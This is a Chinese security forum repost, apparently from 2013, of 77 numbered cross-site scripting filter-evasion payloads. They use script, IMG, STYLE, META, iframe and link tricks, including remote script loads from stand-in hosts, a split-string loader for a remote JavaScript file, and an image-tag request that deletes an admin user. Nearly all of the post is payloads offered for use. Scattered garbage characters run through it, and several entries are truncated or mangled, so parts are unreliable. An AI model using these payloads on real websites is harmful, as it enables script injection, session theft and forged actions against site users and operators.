貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
. S- w3 [5 x. r) q# t0 g) ~. s(1)普通的XSS JavaScript注入
, P5 s0 [. G( m( w3 H. L: V<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>7 a" i: {. ^% l
(2)IMG标签XSS使用JavaScript命令1 A) u! t* b r( B, b' @
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
, N9 ~4 I0 z6 F7 z3 B8 s4 P7 X(3)IMG标签无分号无引号1 D8 i+ G; M/ J
<IMG SRC=javascript:alert(‘XSS’)>4 a# l, \: D. `6 r
(4)IMG标签大小写不敏感
3 |8 ^/ t& v3 q6 S' B5 u<IMG SRC=JaVaScRiPt:alert(‘XSS’)>0 c3 H. w' K- g; j2 R9 P
(5)HTML编码(必须有分号)
5 W& ^4 X( K: d<IMG SRC=javascript:alert(“XSS”)>1 ?6 ` V9 G0 M4 s
(6)修正缺陷IMG标签
- \' Q% [' a0 r; v5 C' m* ^<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
" [# e3 _' H; V" X) Y
+ [/ L: n6 b5 B. l+ b, ^/ i" y8 d' I# Q# e0 v8 _
(7)formCharCode标签(计算器)0 B: T$ j+ ^2 U* r5 x2 }! @
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
6 s7 a& F, m: Z- p(8)UTF-8的Unicode编码(计算器)
/ A+ u' `8 z7 f& F( q3 w<IMG SRC=jav..省略..S')>7 h! E5 C8 s* r+ {
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
L4 t+ f! ?8 n+ n" `+ w<IMG SRC=jav..省略..S')>' {5 Q( i7 m$ M
(10)十六进制编码也是没有分号(计算器)( m, u/ b' Y( ]/ _, f! W, C
<IMG SRC=java..省略..XSS')>/ E5 s( r. t- V- ~
(11)嵌入式标签,将Javascript分开
, b1 `0 e- ]/ ?2 _<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ ]% v( ^6 c8 p(12)嵌入式编码标签,将Javascript分开
2 C+ _ Z" X! ~% V: N! Q<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 k R1 n& u$ C, j+ @' Z- P(13)嵌入式换行符
; i1 ^2 c& \# w+ r$ z' k( {/ J<IMG SRC=”jav ascript:alert(‘XSS’);”>% x3 Y) o, [+ X" I1 y
(14)嵌入式回车
# L0 o& D- j. c- z9 B% u9 t/ M5 v! o<IMG SRC=”jav ascript:alert(‘XSS’);”>5 k5 [5 _6 u7 J4 ^+ r* j) j
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
7 Q" i$ R3 |# v- x<IMG SRC=”javascript:alert(‘XSS‘)”># {. e+ I5 |+ e( Q( P/ B
(16)解决限制字符(要求同页面)) d: |5 u: B" ]* m0 t
<script>z=’document.’</script>* U. S/ `! T' u/ ~, n4 I2 G; d6 z
<script>z=z+’write(“‘</script>: |, c4 l1 X8 [
<script>z=z+’<script’</script>
, g5 w1 Y% }8 F; `( C<script>z=z+’ src=ht’</script>
6 k& r; o- |+ L& S _ i' g<script>z=z+’tp://ww’</script># \6 D b. R7 h! j! R
<script>z=z+’w.shell’</script>8 F' ]% e2 U* m* N6 ~% {% x
<script>z=z+’.net/1.’</script>
F9 c8 a* g. K<script>z=z+’js></sc’</script>8 g' r$ H0 h k
<script>z=z+’ript>”)’</script>
1 d8 W4 R9 z9 k, q7 u' Y5 u<script>eval_r(z)</script>! l9 Z/ @. Y" U* Z! S o
(17)空字符12-7-1 T00LS - Powered by Discuz! Board8 r4 Q' f8 J0 g4 \8 |
https://www.t00ls.net/viewthread ... table&tid=15267 2/62 n6 l% J3 k9 Q5 q$ Z- M3 d7 ^
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out" S7 C) ~: u8 L o* t
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用. {0 _4 m# F. ~7 B9 q4 ]
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
- L1 `! r* l) d* p W, ](19)Spaces和meta前的IMG标签% G' Q: w9 J$ k: R ^; ?* j' x
<IMG SRC=” javascript:alert(‘XSS’);”>+ m- h+ s+ G# l% x4 H3 j& Z
(20)Non-alpha-non-digit XSS
" _2 B& R# ?; e<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
1 U7 A( @ D5 R8 Y' I) h" y h2 x(21)Non-alpha-non-digit XSS to 2/ d. L% s3 [( W" b
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>0 p" _4 G. s, b0 v
(22)Non-alpha-non-digit XSS to 3
& n1 a2 y% _+ }. v<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* j4 d9 ?( k; F0 L0 a" U. T; d0 I, U
(23)双开括号
1 S+ s# w! [8 t& d. l6 t<<SCRIPT>alert(“XSS”);//<</SCRIPT>
# ?, Y& [0 x& U' T* w(24)无结束脚本标记(仅火狐等浏览器)) d1 M* }0 S0 H. p
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>: `+ A6 S# t3 l9 F( a! }
(25)无结束脚本标记2
& t4 u; c: `1 y) Q<SCRIPT SRC=//3w.org/XSS/xss.js>1 L" ^$ l @% @& H
(26)半开的HTML/JavaScript XSS5 M( [2 y% m$ B/ U9 x) r
<IMG SRC=”javascript:alert(‘XSS’)”3 o# N1 H4 [- }+ C& E- J
(27)双开角括号
, _7 J4 {" ^- O( {) ^# G: j( I<iframe src=http://3w.org/XSS.html <
% O; ~: n& ~5 X, y2 J' l% j& h0 m(28)无单引号 双引号 分号3 ]4 \6 g" @# s( Y+ G! i
<SCRIPT>a=/XSS/
% V+ ~9 s' Z6 ~+ t1 Z4 U$ ~4 [& [alert(a.source)</SCRIPT>
: z8 d3 M: ?( t5 H# R/ V9 j(29)换码过滤的JavaScript
' z) W4 N D4 Z( ]* E\”;alert(‘XSS’);//4 |% M( w/ N+ z, S+ C" S% U7 b8 r, O
(30)结束Title标签5 x. P- _/ {, i0 a ?1 O d% @
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
7 I5 i2 q) z# b2 }7 S(31)Input Image4 i7 O/ d, w; d5 ]) C" b' r
<INPUT SRC=”javascript:alert(‘XSS’);”>* a) E1 k; ?% t; G3 E
(32)BODY Image' W- f9 L/ J) d2 e o1 P# G) {
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
) v- |6 B {& o f- h3 H(33)BODY标签
0 G7 W4 ~' z8 V# I, V9 b X<BODY(‘XSS’)>
1 Y+ n0 o5 O8 b- X' B, z(34)IMG Dynsrc
! U. b* W- w6 n/ |+ L<IMG DYNSRC=”javascript:alert(‘XSS’)”>, Y& M, {/ _0 h
(35)IMG Lowsrc
8 O( ]# y! ~: Q<IMG LOWSRC=”javascript:alert(‘XSS’)”>
% \. p) [4 \& K( i+ p! `( c(36)BGSOUND
+ C1 a% F5 O3 X* u<BGSOUND SRC=”javascript:alert(‘XSS’);”>8 e; P. W% ^( z2 d$ C
(37)STYLE sheet* Q' c- Q- i1 m6 v7 i: z( j
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
" b) m# w# {, _" P(38)远程样式表
* P& B8 a/ L9 j7 W, [* a X<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
9 Y) g2 [2 u6 K! B+ ^, i/ E# u(39)List-style-image(列表式)4 F- q* m8 l0 C# K
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS0 f* a- a5 W/ I" J
(40)IMG VBscript8 B- I+ L) v; l! W9 H
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS$ f( R$ [1 W% ^! @5 f/ k
(41)META链接url* J/ M- S7 m. O3 x5 _) w( t
9 E2 M" {4 B0 |% I8 \( w& M
) w. {8 e" p; y
<META HTTP-EQUIV=”refresh” CONTENT=”0;
9 Q9 f$ X2 q W' A0 K yURL=http://;URL=javascript:alert(‘XSS’);”># o* { U8 ^9 W7 \
(42)Iframe% s& W# a$ M# M( C
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>! B3 [3 v7 M- c
(43)Frame9 ~) E5 Z, A- E2 \# d
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
1 C5 j# \, ^* y" M' [4 Rhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
* Z& e3 c% D" G5 Z5 g(44)Table0 F; l+ I" F$ A" r% U1 \
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>0 g; m3 S3 I: X
(45)TD
9 a( T5 e; C) V" p<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
5 Q& I. ]4 Z$ o5 S(46)DIV background-image
/ y7 H6 n' Z4 t8 G<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>3 N0 O$ @$ ]: h3 z7 g6 b' d2 P
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-: ]& |- M( W% X& J% @
8&13&12288&65279)
: W1 K7 A5 X, j5 y: Z/ C( x2 ]) T# G<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
9 [- V" c+ ^% d4 p' D(48)DIV expression
; ^# e; x5 y! q/ u<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
+ d1 p& j; z9 w, ^/ H, U, `/ e(49)STYLE属性分拆表达
( V- e+ `5 d: _* V+ r<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>+ ]+ X8 A1 R% R8 E4 W
(50)匿名STYLE(组成:开角号和一个字母开头)
9 O# I. b# Q, D6 z<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
1 U' U( w% Z' X I(51)STYLE background-image
+ B" }4 g l+ U2 A<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A. i9 c3 j8 \( P2 b! [
CLASS=XSS></A>
3 ?. }$ n9 Y, R E5 m4 K(52)IMG STYLE方式
! W6 P4 S5 x' N3 e9 m) B9 i2 ]; Oexppression(alert(“XSS”))’>- ^0 h" y0 V1 s0 }
(53)STYLE background
) z) p4 n$ g4 @, B2 N k8 s<STYLE><STYLE
1 G: D/ E6 Q g$ P; x$ stype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>- m9 i' C7 ^6 o
(54)BASE S# B m( i/ I4 x- ]% a
<BASE HREF=”javascript:alert(‘XSS’);//”>$ o7 ]& g' d5 d6 i8 C5 ~8 `
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS/ P+ a+ n4 U) Z7 S+ V3 D# n* U1 D
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>" e7 [' ^; ?9 E: J* G( u
(56)在flash中使用ActionScrpt可以混进你XSS的代码
# y2 h+ T% y: v' G! [# ea=”get”;' c' ?. O! r7 y* Z" M' e
b=”URL(\”";- {6 s0 `4 O! M4 V% W
c=”javascript:”;
/ h( C" t1 E5 r2 ^& t7 R4 _d=”alert(‘XSS’);\”)”;
{" b4 I. S/ v! B. M* F( y- Weval_r(a+b+c+d);; V. Z- V5 ?# V3 _4 M" k1 i0 i
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
2 }+ z% n3 X4 S$ j<HTML xmlns:xss>
`3 \7 T$ o$ U# x; C# l% H% ^# {# Q9 o<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>2 ^( \! {- R/ }4 w1 k# l6 h
<xss:xss>XSS</xss:xss>+ e6 f; B" P$ @: q( s
</HTML>
5 C( }: P+ m+ a(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
# w9 Y" e3 `- r# v. d9 j/ S* o& z<SCRIPT SRC=””></SCRIPT>
- q# [! `& U2 q1 H: T- U(59)IMG嵌入式命令,可执行任意命令
2 H# l2 i Y- ]( E9 L5 `% o; ~* f<IMG SRC=”http://www.XXX.com/a.php?a=b”>
; `, \$ b! W. e- k) E/ X+ g1 W(60)IMG嵌入式命令(a.jpg在同服务器)
9 F1 W1 ~4 `" n5 Y+ tRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
( |( i7 b2 }8 @; m- D2 C; w(61)绕符号过滤) S. m X) ]/ b1 u* a
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>; s5 C' v1 D# r# f: |. Z
(62)
$ q4 [4 p* p. N, O- p% |<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>& m+ \6 _3 r! k- V% G4 Q9 d
(63)( O9 Z, S: `# @ h
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>+ ?0 Z2 o1 P2 t0 ^* {, {# k
(64)
6 I1 d9 u$ p: Z& C<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>( Z; R1 z( V. E$ B# E D! _
(65)
9 A" k# X( r3 y5 r0 z) V+ P<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
5 O6 S M# Y$ t3 E, X' ]( w) D(66)12-7-1 T00LS - Powered by Discuz! Board; R+ @" t7 B0 f! H( P- ^
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
% t+ @1 O- {' o4 M<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
& z0 L8 S" ?2 V) P1 \(67)" E3 k8 q3 H4 k
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>5 V/ U2 M& j# H
</SCRIPT>- X& |/ I; n* ]8 Q/ m
(68)URL绕行9 Y/ h" k2 W, j9 n7 ~: _
<A HREF=”http://127.0.0.1/”>XSS</A>% R& @4 d. C4 r; _# _& I! L5 Z+ d( i
(69)URL编码
3 o! `# x) K. s! z J' H) }- \" N<A HREF=”http://3w.org”>XSS</A>2 Q6 s) ^5 Y( ^4 ]. R% `' O
(70)IP十进制
9 ^1 |3 a, q+ O: ~& t<A HREF=”http://3232235521″>XSS</A>
6 C% w- m3 F) m0 E(71)IP十六进制
1 H/ y$ c' g. _- x# U<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
+ L9 d# e5 E% D$ J(72)IP八进制
( |* |8 B- ]% P1 b<A HREF=”http://0300.0250.0000.0001″>XSS</A>. i8 y$ h3 t' m9 p }+ O
(73)混合编码6 U) ?/ E- n8 Z* q# U- @3 b* r7 G+ X6 ~
<A HREF=”h
" d. ]$ m8 b4 r# z2 @2 y+ Ztt p://6 6.000146.0×7.147/”">XSS</A>' i8 p# U0 Y9 o6 q3 B
(74)节省[http:]
j2 g: P& d* J3 V<A HREF=”//www.google.com/”>XSS</A>
3 n. T6 ~) D7 X' x5 j" ?(75)节省[www]. A; _ L' M: T H( }4 d
<A HREF=”http://google.com/”>XSS</A>5 n, _ ^0 N5 g! d, F' B. o: I
(76)绝对点绝对DNS D3 s) U4 |* n$ u8 o
<A HREF=”http://www.google.com./”>XSS</A>$ N3 D5 A y* E$ R
(77)javascript链接# S) Q# c* P# f1 X; ~+ Y
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
/ D5 [, M0 G/ m6 {; H6 c" f' t+ n# b
原文地址:http://fuzzexp.org/u/0day/?p=14
& l7 U7 F R* B2 P4 r# k0 q) X8 S, w+ @7 S6 G( W$ `6 i) Z
|
发表于 2013-4-19 19:22:37
收藏
支持
反对